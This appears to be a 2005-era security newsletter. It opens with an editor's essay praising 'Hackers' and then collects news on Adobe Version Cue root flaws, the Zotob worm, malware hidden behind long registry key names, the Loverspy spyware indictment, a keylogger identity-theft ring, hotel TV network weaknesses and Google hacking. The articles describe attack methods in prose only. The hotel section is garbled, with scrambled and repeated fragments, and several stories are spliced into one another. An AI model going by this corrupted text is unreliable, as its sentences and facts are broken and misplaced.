Ccucu, Chief Editor

Computer crime had scared most of us, human-beings. This crime is usually associated with the term "Hacker". Well, my friend let me tell u this: the real "Hackers" aren't "thieves" or “criminals”, but some young people with great intellectual capacity that could help building a more secure Internet. They could be useful to your company, business or security. Just give them a chance and you'll see. The term "Hacker" for many means a person that steals user information, money, breaks software, create viruses or invade your privacy. Well, my friend, this is wrong. A Hacker is really a very good programmer with high brain capacity and you shouldn't confuse them with Crackers or Carders. The problem is that a Hacker is always misunderstood. His actions are generally un-offending or harmless. Maybe he's just bored... But, we shouldn't forget that the best Internet "terrorists" are highly trained programmers. The reasons why they do this could be various: from simply trying to prove that they are ‘better than others’ to the ‘will to do something new’ or ‘just spend their time in others way than usual’. But the worst is when a Hacker motivates his actions by the lack of chance he gets from society or the lack of money. And here comes the new aspect: it all starts with some little mean action, and, very soon (and this is because they always know what they are doing) become more confident in their actions and take advantage of rich or naive people and this is when the transformation takes part: the Hacker becomes a “Cracker” or a “Carder”. A good example is that of Romanian Hacker, Calin Mateias. Calin Mateias was indicted by a US court for conspiring to steal $10m of computer equipment from Ingram Micro. It seems that the Romanian "Hacker" operates under the name Dr Mengele; he hacked into the computer company’s systems and placed over 2000 fraudulent orders for goods before he was caught. He also had several contact people in the US who helped Calin Mateias to sell the equipment he ordered. His accomplice was also charged at the hearing in L.A., if convicted Mateias could face up to 15 years in prison. Calin was once a great Hacker. He crossed the line and paid for his actions hard and strong. And so, the world lost a great Hacker and a very promising programmer. And this is only a little example. Most crimes aren't brought in the light because it is a small one or the company might feel ashamed. Most of Internet "terrorists" steal between $100-400. They pay for their crimes as everyone else does, but they aren't seen by the large public. But somehow when big companies or governmental organizations hear about them they try to get them to work for them, to use their knowledge and stop others that make the same mistakes they did before. They rehabilitate them so that they can lead their lives in a respectful way. Ex: In the movie ‘Bad Boys’ the police (Will Smith & Martin Lawrence) get a hacker out of jail and as him to hack into a ex-cop’s files to solve a case, and later in the sequel ‘Bad Boys II’ you can see the same hacker working in the police force, and helping them. Real Hackers aren't just a few. They are in fact a very well organized community and there are even Hacker’s trials. The best will win the money that others hope to steal and also win what everybody wants: RESPECT. Also, there are even sites that put up challenges to Hackers: for example decrypt some code by another Hacker and if their good they can put up a challenge of their own. If jogging is a hobby to someone, same is here. But a large community pushes it to extreme and hacking becomes a drug, a good but dangerous job. Many know that real hackers work for big companies or NASA or other government facility or organization and you won't see them making jail. But if this phenomenon isn't controlled and we don't give these high-gifted youngsters real opportunities, we shouldn't be wondering how young John from your street is on the TV as a "big star”, as a Carder or one of the most wanted Crackers that crawl over the Internet. He'll be like Osama Bin-Laden of the World Wide Web. So encourage them, use their knowledge for your protection, or say like a great person once said “Hack me, baby!”

Flaws revealed in Adobe Version Cue Company has issued a patch for vulnerabilities

The Threat from Within

Two new security vulnerabilities were revealed this week in Adobe Systems' Version Cue software, the second and third security flaws discovered in the company's software in less than two weeks, according to security consulting firm iDefense. Both flaws allow local attackers to gain root privileges to a machine through Version Cue, the file-version manager in Adobe's Creative Suite software, according to Michael Sutton, director of iDefense Labs at iDefense, a VeriSign Inc. company.

One flaw is a "library loading vulnerability" that enables potential hackers to load a custom library by executing a method from the command line of VCNative, a root application in Version Cue, said Rich Johnson, a senior security engineer with iDefense Labs. In this way, someone could take full control of a system and gain root privileges, thus enabling them to introduce malicious code.

The other way someone could gain root privileges through Version Cue is to exploit the log file created when the root application VCNative begins running, he said. The log file is always called the same thing, and if a person "knows what it's called they could put a file in there that would allow redirection of that file to a location of choice, then can override special system files with this," Johnson said.

Though published reports claimed that the flaws affect the most recent version of the suite, Creative Suite 2, an Adobe spokesman said in an interview Tuesday that this is not the case. The flaws only affect the previous Creative Suite release, which came out in August 2003, said Bob Schaffel, senior product manager of Version Cue for Adobe.

Adobe already has issued a patch for both vulnerabilities, which can be downloaded at http://www.adobe.com/support/security/main.html#vcuemac, he said.

The flaws were discovered by an individual who only wanted to be identified by his online code name, "vade79," and were submitted to iDefense through its Vulnerability Contributor Program, Sutton said.

Sutton said the flaws are "far from the sexiest vulnerabilities we’ve ever seen" since they can only be exploited by local attackers, meaning they already must have access to the machine to exploit the flaws. Also, the flaws only affect versions of Creative Suite for Apple OS X, so there is a "limited user base" that is affected, he said.

Still, the vulnerability risk is made more significant by the fact that the flaws are relatively easy to exploit once a user has access to a machine, and there is already exploit code that could be used to take advantage of the vulnerabilities that has been released publicly, Sutton said. Though he does not know where the code originated, it can be found on the Web site of the French Security Incident Response Team, www.frsirt.com, Sutton said.

With the discovery of the Version Cue vulnerabilities, there have now been three flaws discovered in Adobe's software in less than two weeks. On Aug. 16, Adobe issued its own security advisory on a buffer overflow discovered in Adobe Acrobat and Adobe Reader. The company immediately issued a product update to patch the flaw.

The recent spate of vulnerabilities are not indicative of a lack of overall security in Adobe's software platform, but instead are the inevitable result of developing a broad portfolio of software, Schaffel said.

"I don’t think this should be seen as some kind of internal trend," he said. "When you consider the broad number of products and the enormous amount of code [we develop], every now and then something like this manages to slip through."

Source:

The Threat from Within Even the best virus protection and network security won't shield your company from a virus if one of your employees downloads it intentionally. While any company can be the target of internal sabotage, a recent survey of security and HR execs by risk management consultancy Risk Control Strategies shows that companies with between 500 and 900 employees are the most at risk: twenty-three percent of those companies have been victimized by internal sabotage through virus downloads in the past two years.

But even if you pull a Trump and fire troublesome employees, the threat won't go away. According to a recent study by the U.S. Secret Service and CERT, which analyzed 49 cases of insider computer sabotage, most incidents were carried out via remote access, and less than half of the saboteurs had authorized access at the time of the incident. The report concludes: "The power of a terminated employee with system administrator access should not be underestimated."

Source:

Malware may hide behind long names in Windows registry Security experts have found a vulnerability in the Windows operating system that could allow malware to lurk undetected in long string names of the Windows Registry.

Windows Worm Variants Emerge, Attack

On Wednesday, four new variants of the ZoTob worm had been detected by F-Secure in Finland, bringing the total to 11, said Mikko Hypponen, the company's manager of anti-virus research. He said the variations apparently had been programmed to compete with each other -- one worm will remove another from an infected computer. Several new variants of a computer worm emerged Wednesday to attack corporate networks running the Windows 2000 operating system, just a week after Microsoft Corp. warned of the security flaw. As experts predicted, the Windows hole proved a tempting target for rogue programmers, who quickly developed more effective variants on a worm that surfaced over the weekend and by Tuesday had snarled computers at several large companies.

Hidden-code flaw in Windows renews worries over stealthly malware A flaw in the way that several security programs and systems utilities detect system changes could allow spyware to spread surreptitiously and have renewed worries about stealthier attack code.

The creators of more advanced rootkits--software designed to stealthily and completely compromise a system--are starting to add memory hiding to their bag of tricks, said Greg Hoglund, CEO of software analysis firm HBGary and author of the recently published ROOTKITS: Subverting the Windows Kernel. Hoglund discussed the technique at the Black Hat Security Briefings and DEF CON hacker convention in July.

"Spyware is the biggest problem right now, and the people that are writing it are starting to get a clue, and that's a scary trend," Hoglund said.

The potential for hiding the execution of programs using overly long registry keys, on the other hand, is much smaller, because Microsoft and affected security software vendors will likely fix the affected utilities soon, he said.

"None of the people that I know who are writing rootkits would not use this method to hide the key," he said.

The technique involves using a registry key whose name is longer than 256 bytes. The Windows Registry holds important system data, including what programs to run at startup. The long key and any of its subkeys are not seen by the affected utilities, but can be read by the system just fine. By using the technique, a malicious program could run every time a computer is started, but keep its execution a secret from the utilities, the Internet Storm Center said.

Programs that apparently cannot detect malicious software using the registry technique include AdAware, Microsoft's Anti-spyware Beta, Norton SystemWorks 2003 Pro, Registry Explorer and WinDoctor, according to an ISC posting. The Internet Storm Center could not create a definitive list, because the programs apparently acted differently on non-English versions of Windows.

Symantec, the creator of the Norton brand of system utilities, is the owner of SecurityFocus.

The technique works against Microsoft's RegEdit utility, but other system utilities, such as Reg.exe and the Microsoft Configuration Editor, are not affected, the software giant stated.

Last week, the Internet Storm Center, a group of security professionals that track threats on the Net, flagged a flaw in how a common Microsoft Windows utility and several anti-spyware utilities detect system changes made by malicious software. By using long names for registry keys, spyware programs could, in a simple way, hide from such utilities yet still force the system to run the malicious program every time the compromised computer starts up.

Already, some spyware authors seem to be playing with the rudimentary technique to try and hide their programs, said Tom Liston, a handler for the Internet Storm Center and a network security consultant for Intelguardians.

"We have seen indications that someone is trying this technique out," Liston said. "Basically, we have seen code that is stuffing a key in the registry with a huge length. Yet, the author still doesn't have it working."

A Microsoft representative said that the company is investigating the report, but does not consider the problem an operating system flaw.

"Our early analysis indicates that this attempt to bypass these features is not a software security vulnerability, but a function within the operating system that could be misused," the company said in a statement. "Microsoft is reviewing the report to determine further details and whether there is any potential impact for customers and will provide appropriate customer guidance if necessary."

The potential threat comes as more malicious software has started to use various techniques to attempt to escape detection. Some attackers have merely used targeted Trojan horses and customized spyware to evade defensive software. Such techniques are believed to be the reason that a sustained attack on U.S. and U.K. government agencies and industry has largely gone unnoticed.

The developers of the affected programs are already working on fixes for their products. If Microsoft fixes the RegEdit issue, it may also solve the issue for other vendors, ISC's Liston said.

"It should be something that Microsoft should be able to address in the next monthly update," he said. "There are a lot of programs out there that do things like look at the registry that are affected by this." While the technique may only be useful for a limited time, spyware authors will likely incorporate it into their programs, said Joe Stewart, senior researcher for security firm Lurhq. Another major threat, bot software, will likely not use the technique, he said.

"Spyware usually does a much better job of hiding itself in the registry than bot software," Stewart said. "Even though bots are often used for spyware, adware or other financially motivated activity, they are programmed as if they were just general-purpose utilities--for some reason they almost always go with the tried-and-true 'Run' registry key."

System integrity checkers and security software should attempt to detect more surreptitious techniques like registry hiding, added HBGary's Hoglund.

Hoglund and two other researchers have modified a common rootkit using techniques, ironically, taken from a way of protecting against buffer overflows, a common software flaw. The memory cloaking allows a rootkit to run its own code while hiding that code from detection by the operating system. Such techniques will likely become common in malicious software in the near future, he said. Hoglund stressed that security software makers have to start thinking more like attackers and adding more advanced detection capabilities to their products.

"If your security tools aren't also using rootkit-like techniques, then they can be subverted easier," he said. Source:

'Loverspy' Spyware Creator Indicted, On the Run Allegedly violated U.S. computer privacy laws, Feds say. The creator of Loverspy, software to surreptitiously observe individuals' online activities, has been indicted for allegedly violating U.S. federal computer privacy laws.

If convicted, Carlos Enrique Perez-Melara, could face a maximum sentence of 175 years in prison and fines of up to $8.75 million. His current whereabouts are unknown.

Four individuals who purchased Loverspy to illegally spy on others were also indicted.

"This federal indictment--one of the first in the country to target a manufacturer of "spyware" computer software--is particularly important because of the damage done to people's privacy by these insidious programs," John Richter, acting assistant attorney general of the U.S. Department of Justice's Criminal Division, said in a statement. "Law enforcement must continue to take action against the manufacturers of these programs to protect unsuspecting victims and seek punishment for those responsible for wreaking havoc online." Perez-Melara, 25, was indicted last month on 35 counts of manufacturing, sending, and advertising a surreptitious interception device (the Loverspy program), unlawfully intercepting electronic communications, disclosing unlawfully intercepted electronic communications, and obtaining unauthorized access to protected computers for financial gain. Each count carries a maximum penalty of five years in prison and a maximum fine of $250,000. His indictment was returned on July 21 by a federal grand jury sitting in the U.S. District Court for the Southern District of California in San Diego, but the indictment was unsealed only Friday.

Zotob Arrest Breaks Credit Card Fraud Ring Turkish officials have identified 16 more suspects this week in a continuing crackdown on illegal online activity that stems from the arrest of two men in connection with the Zotob Internet worm.

The 16 individuals are believed to be connected to a credit card theft and identity theft ring, but not directly involved with the creation or dissemination of Zotob, according to Paul Bresson, an FBI spokesperson.

The action followed the arrest of Atilla Ekici, 21, in Adana, Turkey on Aug. 26 in connection with the recent Zotob Internet worm and with Mytob, another wide-spreading worm that first appeared in February.

Little information was available on the arrests Tuesday, which was a holiday in Turkey. Officials contacted by eWEEK at the U.S. Consulate in Adana and at the U.S. Embassy in Ankara said they had no information on the additional arrests.

However, links between Ekici, who used the online handle "Coder," and co-conspirator Farid Essebar, an 18-year-old resident of Morocco who was known online as "Diabl0," would not be surprising, security experts said. Both men are believed to have controlled large networks of compromised computers, or "botnets," according to Joe Stewart, a senior security researcher at managed security provider LURHQ Corp.

Bot networks are frequently used to harvest information or intellectual property from compromised machines, as well as for distributing spam, advertising and viruses.

Microsoft Corp. and the FBI were cooperating in an investigation of botnets before Zotob was released, said Tim Cranton, a senior attorney at Microsoft and director of the company's Internet Safety Enforcement team.

Cranton declined to comment on whether Microsoft's investigators were on to Diabl0 before Zotob, but said the company had "developed a lot of intelligence" about the botnets Diabl0 operated prior to Essebar's arrest and that the information "helped inform" the actions of law enforcement.

Secret Monitoring

Perez-Melara advertised and sold Loverspy and EmailPI software over the Internet for $89 a copy to people looking to secretly monitor an individual's e-mail, passwords, chat sessions, and instant messages, as well as the Web sites they visit. Purchasers of the program could log into a Loverspy Members Area on the Loverspy and EmailPI Web sites and choose an e-card and greeting that would be sent to the victim. Loverspy would arrive hidden inside the e-card and would launch when the victim opened the card. After being installed, Loverspy would send regular reports collating the victim's online activities either directly to the purchaser of the spy software via e-mail or to Perez-Melara, who would then forward the reports to the purchaser. The spyware also enabled the purchaser to remotely control the victim's computer to the extent of altering and deleting files, and surreptitiously turning on any Web camera hooked up to the victim's computer. From around July 1, 2003, until October 10, 2003, approximately 1000 individuals in the United States and abroad bought Loverspy and sent e-cards containing the application to around 2000 people, according to the authorities. Around half of those 2000 are known to have had their computers compromised and their communications intercepted, the indictment stated. The antivirus software of the day didn't identify Loverspy as dangerous, so it didn't block the program's installation, the indictment noted. Perez-Melara's operations were shut down after the FBI executed a federal search warrant for his San Diego apartment on October 10, 2003. The victims named in the indictment are located in California, Hawaii, Missouri, New Hampshire, North Carolina, Pennsylvania, and Texas.

Others Indicted

The four other individuals indicted with Perez-Melara by the federal grand jury in San Diego are John Gannitto of Laguna Beach, California; Kevin Powell of Long Beach, California; Laura Selway of Irvine, California; and Cheryl Ann Young of Ashland, Pennsylvania. They are each charged with two counts--unauthorized access to protected computers (via Loverspy) in furtherance of other criminal offenses and illegally intercepting the electronic communications of their victims. Each of the two counts carries a maximum penalty of five years in prison and a maximum fine of $250,000. Other purchasers of Loverspy have been prosecuted by federal authorities in Charlotte, North Carolina, Dallas, and Honolulu. Prosecutions are going ahead in Kansas City, Missouri, and Houston. All known Loverspy victims have been notified by e-mail that they were targeted by the program, according to the authorities.

The 16 new suspects may be operating their own botnets using variants of Zotob or the earlier Mytob worms, which Essebar is believed to have created.

According to Stewart, each member of the group would probably be given a copy of the source code by Essebar and would compile it into a unique Mytob or Zotob variant, with its own IRC (Internet Relay Chat) server and channel details, then release the variant on the Internet and build a botnet out of hosts the worm compromises.

"There would be no reason for them not to have their own botnets," he said. In fact, a sizeable botnet is almost a requirement for those who move in the Internet underground, where the slightest online provocation can invoke a denial-of-service attack from another botnet operator.

While the other suspects in the case may be acquainted with Diabl0 and Coder, Stewart said it's wrong to think of the botnet operators as a tightly coordinated group.

"It's really just individuals and small groups of botnet owners who get together," he said.

While Diabl0 and Coder were not the largest botnet operators, they were very successful and their creations generated a lot of "noise" on the Internet, he said. Virus researchers at Sophos PLC's SophosLabs said that Diabl0 is believed to be behind about 20 other virus variants, including Mydoom-BG and versions of the Mytob worm.

Together, the variants accounted for six of the top 10 viruses and more than 54 percent of all viruses reported to Sophos in August, the company said.

"It will good to see them go," Stewart said.

Source:

Is Malware Hiding in Your Windows Registry? Security company says vulnerability could allow malicious software to lurk undetected. Security experts have found a vulnerability in the Windows operating system that could allow malware to lurk undetected in long string names of the Windows Registry. According to a security advisory by Denmark-based IT security company Secunia, the weakness is caused by an error in the Windows Registry Editor Utility's handling of long string names. A malicious program could hide itself in a registry key by creating a string with a long name, which would allow the malicious string and any created after it in the same key to remain hidden, according to Secunia. Keys are stored in the Windows Registry, which saves a PC's configuration settings. Secunia has confirmed that the vulnerability affects the "Run" registry key, according to the advisory. Malicious strings in this key will be executed when a user logs in to the PC. Affected Systems The vulnerability affects Windows XP and Windows 2000 and has been confirmed to exist on fully updated XP systems with Service Pack 2 and Windows 2000 systems with Service Pack 4, according to Secunia. Microsoft issued a statement on the vulnerability saying it is investigating the weakness and is not aware of any malicious attacks that have exploited it.Moreover, the company asserted that the vulnerability by itself could not allow an attacker to remotely or locally attack a user's computer. It could only be exploited if the computer had its security compromised in some other way or was already running malicious software. In its advisory, Secunia provided several solutions to avoid exploitation of the vulnerability, one of which is to ensure that systems have up-to-date anti-virus and spyware detection software installed. The security company also said it is possible to see the hidden registry strings with the "reg" command-line utility of the Windows Registry, and that the "regedt32.exe" utility on Windows 2000 is not affected by the weakness.

U.S. Agencies Take Security Into Their Own Hands Chief information security officers at federal agencies are more concerned about the quality of the software they buy than they were a year ago, and they are beginning to integrate security functions directly into their daily operations rather than relying on outside help, according to a study released today.

The study, based on a survey conducted by Intelligent Decisions Inc., found that these and other changes in CISO outlook reflect a growing maturity of the role of IT security within the government. After many years of struggling to implement a basic security framework, government agencies are turning to more complex issues.

"They've got the systems administration component of security down," said Roy Stephen, cyber security director at Intelligent Decisions, in Ashburn, Va. "Before, people thought you could just put a firewall at the edge of the network. [Now] you need intru-sion detection mechanisms on each machine."

Last year, CISOs typically sought training and installation with the purchase of new technology, but increasingly they are showing confidence that their own systems administrators can handle deployment and management. In a similar vein, the survey revealed that security operations are being rolled back into network operation centers rather than being approached as separate functions. "People are not as interested in getting specialized cyber security help. They're more interested in having it built into their daily functions," Stephen said,

The survey also showed that federal CISOs are spending considerably more time on compliance with the 2002 Federal Information Security Management Act than they have in the past, which came as a surprise to the study's authors. CISOs spend an average of 3.75 hours a day on compliance activities, compared to 3.06 hours one year ago.

"We had hoped that FISMA would get easier and more automated as time went on," Stephen said. "The CISO is spending more time on it himself or herself. It just shows how big a concern it is."

Symantec, CipherTrust load up security appliances Much like most enterprise-class IT tasks, security can become weaker when a company network is bogged down with too many devices. Management borders on the impossible and IT can never quite get as clear a picture of its own security as it needs.

Three indicted in U.S. spam crackdown Three people accused of sending massive amounts of spam face possible prison sentences after being indicted by a grand jury in the U.S. state of Arizona and accused of violating the CAN-SPAM Act of 2003 and other charges, the U.S. Department of Justice said in a statement.

Among the greatest concerns in government IT shops is the vulnerability of wireless networks and mobile devices, the survey found. CISOs remain worried about unauthorized wireless access points, unauthorized wireless deployments and rogue WiFi devices.

"We know that every agency has wireless somewhere, whether they admit it or not," Stephan said.

Although wireless is prevalent throughout the government, fewer than half of the organizations surveyed had adopted security controls recommended by the National Institute of Standards and Technology. The recommendations include comprehensive policies, security tool configuration requirements, monitoring programs and policy training. Next month NIST is expected to float new wireless security guidelines, which will evolve into new mandates.

NIST launches new vulnerability database The National Institute of Standards and Technology has launched a new vulnerability database to help security professionals learn about and correct vulnerabilities. The database, known as the National Vulnerability Database (NVD), integrates all publicly available U.S. government resources on vulnerabilities and provides links to industry resources, according to NIST. It is built on a dictionary of standardized vulnerability names and descriptions called common vulnerabilities and exposures. About 300 new vulnerabilities are discovered each month, according to NIST. Updated daily, the NVD contains information on almost 12,000 vulnerabilities. It allows users to search by a variety of characteristics, including software name and version number; vendor name; and vulnerability type, severity and impact, the agency said. The database can also be used to research the vulnerability history of a product and view vulnerability statistics and trends. The NVD was developed by researchers in the NIST's Computer Security Division in conjunction with the Department of Homeland Security's National Cyber Security Division.

Use Ad-Aware to Cover Your Tracks

You probably know that Lavasoft's Ad-Aware program sniffs out adware on your system, but did you know that the free utility can also erase your browser's search and Address histories, eliminate Word's list of recently opened documents, and clear the record of files played in Windows Media Player? These privacy protectors, and many others, are available every time you complete an Ad-Aware scan.

After you download and install the program, choose the second button from the top-right corner to open the integrated WebUpdate tool, and ensure that you have the most recent list of adware definitions. With your new definitions in place, click the Scan now button on the left, choose Perform smart system scan, and click Next. When the scan finishes, click Next again to see the scan results.

The entries listed under the Critical Objects tab are files that Ad-Aware has identified as potential threats to your privacy. Use the program's Knowledge Base and Threat Assessment Chart to determine whether to delete the files: Click Help, Contents, double-click Support, and choose either entry to view more information. (Note that many of the "threats" may be relatively harmless tracking cookies that you might find useful when you return to the sites that left them. For example, a cookie left by a shopping site may display items similar to those you've recently purchased on the site.) Check the files you want to delete, and choose Quarantine.

Now click the Negligible Objects tab to see the 'Most Recently Used' files list. The list tracks the documents you've opened lately in such applications as Adobe Reader and Microsoft Office, the terms you've entered in your browser's search and Address fields, and your file-download history, among other activities. Check the items you'd like to erase, click Quarantine, give the file a name (such as old history), and click OK twice. Choose Next and OK once more to view the scan results.

"Two servers or even two different Web sites can work together to verify information like this, but without either one of them knowing enough to answer or find out the answers themselves," says Dr. Burt Kaliski, chief scientist for RSA Labs. Even if someone hacks the servers, they can't access your information.

Others are working to provide stronger authentication via hardware devices. Charles Palmer, head of security and privacy at IBM Research, believes many online privacy woes can be solved by leveraging a security chip like the Trusted Platform Module, an IBM-developed device now championed by several industry players. This kind of chip encrypts files and passwords, making them readable only on your computer.

A4Vision's facial recognition software is one way to authenticate identity.

Of course, you must also make sure that no one else can log on to your PC. That's where biometric authentication comes in. Fingerprint readers capable of verifying your identity are already available for desktops and laptops. Companies like Compaq, DigitalPersona, Ethentica, Identix, and Sony offer devices that attach via USB cable, and several IBM laptops actually come with integrated readers. Other companies, including such names as Iridian Technologies and Visage, are offering retinal scanning and facial-recognition tools.

A4Vision's facial-recognition technology can even verify your identity continually. Projecting a light through a filter, the system creates a virtual grid roughly four feet in width. As you step into this grid, it distorts to follow the topology of your face. A camera then measures the distance to your face at each point within the grid. These measurements are unique, and when you step in front of the camera once again, the system is able to identify you.

"We've used it in highly secure areas where companies want to know who is behind a workstation at all times," says CEO Grant Evans. "Our system can observe the person and give positive identification 14 or 15 times a second."

Identity Theft Is Out of Control

More than 7 million people are victims of identity theft each year—or nearly 20,000 thefts a day—according to Gartner Research and Harris Interactive. Many thefts occur because of casual mistakes in the offline world: handing a credit card to the wrong person or scribbling your Social Security number on a sheet of paper someone can find. But many more are facilitated by the Internet, which still has a long way to go when it comes to protecting our privacy.

Identity pirates can gather all sorts of confidential information about you by prowling the Web. With a little more ingenuity, they can hack into your online accounts—mining credit card numbers, addresses, and telephone numbers. And if you let your guard down, they can use underhanded techniques like phishing and pharming to fool you into giving them information. Social engineers con many people into giving out sensitive data simply by asking for it.

Think you've taken the necessary precautions? Think again. Virgil Griffith, a researcher at Indiana University, recently found a hole in the system that affects us all. Most Web sites provide a way to access password-protected accounts when you've forgotten your password. When you sign up for an account, the site typically asks you to fill in the answer to a common question, such as "What's your mother's maiden name?" or "What street did you grow up on?" If you forget your password, the site grants you access when you answer this question.

Unfortunately, by trolling free public records in Texas, Griffith proved that anyone could track down mothers' maiden names for more than a quarter of the state's population.

White hats—corporate security experts—look closely at such holes. Researchers at RSA Security, for instance, are considering ways of improving so-called knowledge-based authentication. They're developing a technology, code-named Nightingale, that lets sites verify answers to authentication questions without actually storing those answers on their servers.

You could even use biometrics to verify your identity with a third party. The trouble is that when you use traditional biometrics, there's always the danger that someone will hack into a machine where your fingerprint, retinal, or facial information is stored. Recognizing this problem, researchers at the Stevens Institute of Technology, Johns Hopkins University, Carnegie Mellon, and Florida State are working on a biometrics system that can operate without storing your physical data.

The system would use your typing or voice patterns to store a code across two different tables of information. "Simply by typing on your keyboard, you could unlock the code," says Susanne Wetzel, a Stevens Institute researcher, "but to an attacker, the tables would look like random pieces of information."

This only begins to describe the vast arsenal of authentication and privacy projects under way at universities and in corporate research labs. In the years to come, identity theft will present a much tougher challenge to would-be thieves.

Source:

ID theft automated using keylogger Trojan Anti-spyware researchers have uncovered a massive identity theft ring linked to keylogging software. The malware was discovered by Patrick Jordan of Sunbelt Software while doing research on the infamous CoolWebSearch application but the key logger itself is not CWS. It's far nastier. During the course of infecting a machine, Jordan discovered that the machine became a spam zombie that was also sending data back to a remote server. He found that thousands of infected machines are contacting a US-based server daily and a portion of these are writing to a keylogger file, which is periodically harvested by cybercriminals. "The types of data in this file are pretty sickening to watch. You have search terms, social security numbers, credit cards, logins and passwords, etc," Sunbelt president Alex Eckelberry writes. Sunbelt has contacted some of the affected individuals to warn them their personal details had been exposed. It has also informed the FBI. It remains unclear if the keylogger is directly related to CWS or not. Sunbelt advises consumers to use a personal firewall to prevent the key logger from "phoning home".

The use of key logging software on an industrial scale is rare but not unprecedented. Malware can be programmed to send back sensitive information to designated servers, in some cases logging into the servers using passwords written into viral code. Security researchers able to reverse engineer items of malware can extract this password and location information and use it to monitor hacker activity.

Source:

Hotel hacking could pump smut into every room Hotel hybrid broadband internet and TV-on-demand entertainment systems are open to attack, security researchers warn. Penetration testing firm SecureTest has identified a number of vulnerabilities in the implementation of hotel broadband systems delivered using Cisco's LRE (long-reach Ethernet) technology. Using a laptop connected to a hotel network, SecureTest found it was possible to control the TV streams sent to each room or gain access to other user’s laptops.

Hotel hacking could pump smut into every room

The secu

outfit ThSecuweakn

rity holes uncovered call to mind the security infra-red controls recently uncovered

rector at secure hosting . Ken Munro, managing director of

reTest, said that its research covered security esses in IP (as opposed to infra-red) systems.

ng a stay in a hotel belonging to an unnamed e chain, a Secu

vity. He founabled TV

full TVh it was po

change channels or tding to Secure able to

his menu and display nt on everyroadcast content directly from a laptop over heory, this could enable hackers to download

adcast any material throughout the hotel complex.

lnerability revolved around insecure network uration. There appeared to be no segregation

client devices, creating a means for a user to ess other devices connected to the same hotel

he system scrutinised used a Cisco 575 LRE allows existing CAT2 (telephone) cabling to

emand services avoiding the need to roll out CAT5 (twisted pair) cabling to each room.

y risk lies not in terms of this technology but t was implemented, problems SecureTest has

replicated at other hotels. During a previous vestigation, SecureTest used a different fixed

hotel system implemented by another hotel cated a connection to an internal FTP server. d open access to information such as a

backup database of TV usage. or disgruntled employee could get eir kicks

sing and manipulating the TV menu, but this has much wid

t theiral messagoreover, ss is inadequately

ected in many cassuming ity have a p

desktortainment systems need to act now to prevent

these scenarios."

sing and manipulating the TV menu, but this has much wid

t theiral messagoreover, ss is inadequately

ected in many cassuming ity have a p

desktortainment systems need to act now to prevent

these scenarios."

exploits in hotel by Adam Laurie, technical di

e Bunker

Hotel hybrid broadband internet and TV-on-demand entertainment systems are open to attack, security researchers warn. Penetration testing firm SecureTest has identified a number of vulnerabilities in the implementation of hotel broadband systems delivered using Cisco's LRE (long-reach Ethernet) technology. Using a laptop connected to a hotel network, SecureTest found it was possible to control the TV streams sent to each room or gain access to other user’s laptops.

Duri

worldwidconnectiroom IP eto this port a over whic

reTest staffer paid for internet nd TCP port 5001 open on the in-providing the service. Connecting maintenance menu was displayed ssible to carry out test procedures, urn the TV on and off. Test, a hacker might be configure the system to

Accoraccess tadult contebe used to bthe TV. In tand bro

TV channel. The port could also

Another vuconfigbetweenaccnetwork. Tbox, whichcarry on-d

The securitin how iseenininternet/TV chain and loThis provide

"A hacker by accesbreach could broadcasown politicMunro. "Mprotnetwork aUnless thecan snoop onguest ente

y accesbreach could broadcasown politicMunro. "Mprotnetwork aUnless thecan snoop onguest ente

th

er implications. An individual own advertising or an activist their e to every room," said SecureTest's

fixed internet acce

er implications. An individual own advertising or an activist their e to every room," said SecureTest's

fixed internet acceses. People plug into a hotel

’s a trusted connection but it’s not. ersonal firewall running, fraudsters ps at leisure. Hotels and suppliers of

ses. People plug into a hotel ’s a trusted connection but it’s not. ersonal firewall running, fraudsters ps at leisure. Hotels and suppliers of

Brazil cuffs 85 in online bank hack dragnet

Brazilian federal police last week cuffed 85 people across seven states suspected of hacking online bank accounts and netting $33m, Reuters reports. The arrests were the culmination of a four-month investigation, codenamed "Operation Pegasus", which generated 105 arrest warrants. A total of 410 officers took part in the swoop.

Is Google Exposing You to Hack Attacks? Hackers use search engine to find unsecured sites, networks, routers, and Webcams.

Somewhere out on the Internet, an Electric Bong may be in danger. The threat: a well-crafted Google query that could allow a hacker to use Google's massive database as a resource for intrusion.

"Electric Bong" was one of a number of household devices that security researcher Johnny Long came across when he found an unprotected Web interface to someone's household electrical network. To the right of each item were two control buttons, one labeled "on," the other, "off."

Searching for Holes

Long, a researcher with Computer Sciences Corporation and author of the book Google Hacking for Penetration Testers, was able to find the Electric Bong simply because Google contains a lot of information that wasn't intended to lie exposed on the Web. The problem, he said at the Black Hat USA conference in Las Vegas last week, lies not with Google itself but with the fact that users often do not realize what Google's powerful search engine has been able to dig up.

In addition to power systems, Long and other researchers were able to find unsecured Web interfaces that gave them control over a wide variety of devices, including printer networks, PBX (private branch exchange) enterprise phone systems, routers, Web cameras, and of course, Web sites themselves. All can be uncovered using Google, Long said.

But the effectiveness of Google as a hacking tool does not end there. It can also be used as a kind of proxy service for hackers, Long said.

Getting In Via Google

Although security software can identify when an attacker is performing reconnaissance work on a company's network, attackers can find network topology information on Google instead of snooping for it on the network they're studying, he said. This makes it harder for the network's administrators to block the attacker. "The target does not see us crawling their sites and getting information," he said.

Often, this kind of information comes in the form of apparently nonsensical information--something that Long calls "Google Turds." For example, because there is no such thing as a Web site with the URL "nasa," a Google search for the query "site:nasa" should turn up zero results. Instead, it turns up what appears to be a list of servers, offering an insight into the structure of the U.S. National Aeronautics and Space Administration's internal network, Long said.

Combining well-structured Google queries with text processing tools can yield things like SQL passwords and even SQL error information. This could then be used to structure what is known as a SQL injection attack, which can be used to run unauthorized commands on a SQL database. "This is where it becomes Google hacking," he said. "You can do a SQL injection, or you can do a Google query and find the same thing."

Although Google traditionally has not concerned itself with the security implications of its massive data store, the fact that it has been an unwitting participant in some worm attacks has the search engine now rejecting some queries for security reasons, Long said. "Recently, they've stepped into the game."

b

Online scammers exploiting Katrina disaster Internet criminals wasted no time in exploiting the hurricane Katrina disaster, immediately orchestrating online donation scams and sending malicious email.

A widespread spam campaign pretends to offer breaking news about the hurricane, which struck the Gulf Coast region earlier this week. The spam tries to lure users to a bogus website that could infect their PCs with malicious code, according to anti-virus supplier Sophos.

"Once infected, the computer is under the control of the remote criminal hackers who can use it to spy, steal or cause disruption," Gregg Mastoras, Sophos senior security analyst, said in a statement.

The SANS Internet Storm Center said users should also watch out for fake emails and domains being used to collect donations for hurricane victims.

In addition to getting money through fake foundations, the fraudulent domains can steal user names and passwords and lead users to install malicious software on their PCs, according to a posting on the storm center's site.

